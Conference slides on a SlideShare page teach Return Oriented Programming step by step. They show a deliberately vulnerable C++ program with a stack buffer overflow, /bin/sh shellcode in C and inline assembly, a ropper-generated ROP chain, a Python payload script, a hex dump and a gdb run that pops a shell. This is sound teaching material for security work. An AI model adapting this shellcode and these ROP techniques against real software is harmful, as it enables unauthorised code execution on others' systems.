SlideShare a Scribd company logo

ROP Shellcode

Patricia Aas
Patricia Aas

Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.

Software
1 of 63
Download to read offline
1 Turtle Sec @pati_gallardo Warning! This presentation has A LOT of assembly Run while you have the chance Go watch Ólafur's talk, it's fun and he's basically making malware Too tired for 40 minutes of stepping through assembly?
2 Return Oriented Programming an introduction NDC TechTown2023 Patricia Aas Turtle Sec
3 @pati_gallardo Patricia Aas - Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
4 @pati_gallardo Semi-Artisanal ROP
5 TurtleSec @pati_gallardo 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
6 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” The Programmers Mental State Machine
7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
8 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” Weird State “globalthermonuclearwar” Terminate The Weird Machine (imagine a smaller buffer)
9 @pati_gallardo Our x86 32-bit shellcode for Linux
10 TurtleSec @pati_gallardo Shellcode Piece of code, typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
11 TurtleSec @pati_gallardo Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
12 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
13 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
14 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
15 TurtleSec @pati_gallardo $ gcc -Wno-nonnull -Os -m32 -static -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
16 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
17 TurtleSec @pati_gallardo ebx eax ax ah al 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
18 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
20 TurtleSec @pati_gallardo eax Syscall number 0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xor ebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
22 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stack manipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xor ebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
27 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xor ebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
31 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
32 TurtleSec @pati_gallardo 1. int main(void) { 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
33 TurtleSec @pati_gallardo $ clang -m32 -o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
34 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
35 TurtleSec @pati_gallardo ROP Return Oriented Programming When your stack is not executable
36 TurtleSec @pati_gallardo Foundational idea: The ret instruction transfers execution to the (return) address located on the stack
37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stack ptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
38 TurtleSec @pati_gallardo Rest of Rop Chain Return address Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
39 TurtleSec @pati_gallardo Put it all into the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2. from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
41 TurtleSec Terminal $ ropper --file target --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
42 Terminal TurtleSec #!/usr/bin/env python # Generated by ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 9f9eeaf6c92b653457587a35c043cfdf6b44ccaf270e2fe12ab8bfdb12dc04af rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain Addresses in rebase_0 calls are offsets from the IMAGE_BASE_0 address
43 Terminal TurtleSec rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += '//bi' rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc060) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc064) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000e094) # 0x08056094: xor eax, eax; ret; rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x00001022) # 0x08049022: pop ebx; ret; rop += rebase_0(0x001cc060) rop += rebase_0(0x00004ddb) # 0x0804cddb: pop ecx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000e075b) # 0x0812875b: neg eax; ret; rop += rebase_0(0x00113650) # 0x0815b650: int 0x80; ret; The ROP Chain 1 2 3 4 6 8 5 7
44 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 6. 0x00004ddb 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
45 TurtleSec @pati_gallardo 0x000af97a 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x00017fdc 0x001cc060 0x00003a02 '//bi' 0x000af97a eax ebx ecx edx stack ptr '//bi' stack ptr 0x001cc060 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x000af97a 0x00003a02 0x00017fdc Stack
46 TurtleSec @pati_gallardo 0x000af97a 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x00017fdc 0x001cc064 0x00003a02 'n/sh' 0x000af97a eax ebx ecx edx stack ptr 'n/sh' stack ptr 0x001cc064 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x000af97a 0x00003a02 0x00017fdc 'n/sh' Stack
47 TurtleSec @pati_gallardo 0x0000e094 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x00017fdc 0x001cc068 0x00003a02 0x0000e094 eax ebx ecx edx stack ptr 0x00000000 stack ptr 0x001cc068 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x0000e094 0x00003a02 0x00017fdc 'n/sh' 0x00000000 Stack
48 TurtleSec @pati_gallardo 0x00001022 0x00004ddb 0x00003a02 0x000af97a 0x000e075b eax ebx ecx edx stack ptr stack ptr stack ptr Stack Registers RX Memory Instruction ptr 0x00001022 0x00004ddb 0x00003a02 pop ebx; ret; pop ecx; ret; pop edx; ret; pop eax; ret; neg eax; ret; 0x001cc068 0x001cc068 stack ptr 0x000af97a 0xfffffff5 stack ptr 0x000e075b 0x001cc060 0x0b 0x000e075b 0xfffffff5 0x000af97a 0x001cc068 0x00003a02 0x001cc068 0x00004ddb 0x00001022 0x001cc060 0x001cc060 0x001cc064 0x001cc068 '//bi' RW Memory 'n/sh' 0x00000000
49 TurtleSec @pati_gallardo 0x00113650 0x00113650 eax ebx ecx edx stack ptr Stack Registers RX Memory Instruction ptr 0x00113650 int 0x80; ret; 0x00000000 0x001cc068 0x001cc068 0xfffffff5 0x001cc060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv 0x001cc060 0x001cc064 0x001cc068 '//bi' RW Memory 'n/sh' 0x00000000
50 @pati_gallardo Semi-Artisanal ROP
51 @pati_gallardo Finding Gadgets
52 TurtleSec @pati_gallardo 1. 0x000af97a 7. 0x000e075b 8. 0x00113650 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000e075b) # 0x0812875b: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113650) # 0x0815b650: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
53 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
54 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 6. 0x00004ddb 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
55 TurtleSec @pati_gallardo Missing 3 gadgets xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
56 Terminal TurtleSec $ ropper --file target --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x080fa6c2: xor ebx, ebx; lea esi, [esi]; mov eax, edx; int 0x80; 0x080eef78: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0816ae61: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5cf40]; call dword ptr gs:[0x10]; 0x08078c0d: xor ebx, ebx; push esi; call dword ptr [eax + 0x24]; 0x0804cded: xor ebx, ebx; ret;
57 TurtleSec @pati_gallardo All 3 are present in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cded 0x0804ce00 0x0804ce13 Absolute address 0x00004ded 0x00004e00 0x00004e13 Relative address
58 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
59 Terminal TurtleSec $ ./rop_chain_file.py > rop_chain_file $ xxd -g 4 rop_chain_file 00000000: 90909090 90909090 90909090 90909090 ................ 00000010: 90909090 90909090 90909090 90909090 ................ 00000020: 90909090 90909090 90909090 90909090 ................ 00000030: 90909090 90909090 90909090 90909090 ................ 00000040: 90909090 90909090 90909090 90909090 ................ 00000050: 90909090 90909090 90909090 90909090 ................ 00000060: 90909090 90909090 90909090 90909090 ................ 00000070: 90909090 90909090 90909090 90909090 ................ 00000080: 9090edcd 04087a79 0f08faff ffff5b87 ......zy......[. 00000090: 120850b6 15087a79 0f082f64 657602ba ..P...zy../dev.. 000000a0: 04086040 2108dcff 05087a79 0f082f74 ..`@!.....zy../t 000000b0: 747902ba 04086440 2108dcff 05089460 ty....d@!......` 000000c0: 050802ba 04086840 2108dcff 05082290 ......h@!.....". 000000d0: 04086040 210800ce 040813ce 04087a79 ..`@!.........zy 000000e0: 0f08fbff ffff5b87 120850b6 15087a79 ......[...P...zy 000000f0: 0f082f2f 626902ba 04086040 2108dcff ..//bi....`@!... 00000100: 05087a79 0f086e2f 736802ba 04086440 ..zy..n/sh....d@ 00000110: 2108dcff 05089460 050802ba 04086840 !......`......h@ 00000120: 2108dcff 05082290 04086040 2108dbcd !....."...`@!... 00000130: 04086840 210802ba 04086840 21087a79 ..h@!.....h@!.zy 00000140: 0f08f5ff ffff5b87 120850b6 15080a ......[...P.... Write the ROP string to file and have a look at it
60 $ hello Terminal TurtleSec $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < rop_chain_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 22820 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain
61 @pati_gallardo We go shel ! Than Yo !
62 Turtle Sec @pati_gallardo I'm "sorry" <3 If this is totally your jam, join my 2-day training at NDC Security January 8th and 9th in Oslo 😈
63 @pati_gallardo Questions? Photos from pixabay.com Patricia Aas, TurtleSec Turtle Sec

Recommended

Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 

Recommended

Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...Asuka Nakajima
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsHisaki Ohara
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXLLinaro
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-SlidesMarat Vyshegorodtsev
 
3
33
3Marat Vyshegorodtsev
 
x86 & PE
x86 & PEx86 & PE
x86 & PEAnge Albertini
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessThomas Gregory
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflowsPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregoryzakiakhmad
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with PythonThomas Gregory
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus AnalysisGangSeok Lee
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonMalachi Jones
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits Raleigh ISSA
 
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Gavin Guo
 
Telling a story
Telling a storyTelling a story
Telling a storyPatricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
 

More Related Content

Similar to ROP Shellcode

[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...Asuka Nakajima
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsHisaki Ohara
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
08 - Return Oriented Programming, the chosen one
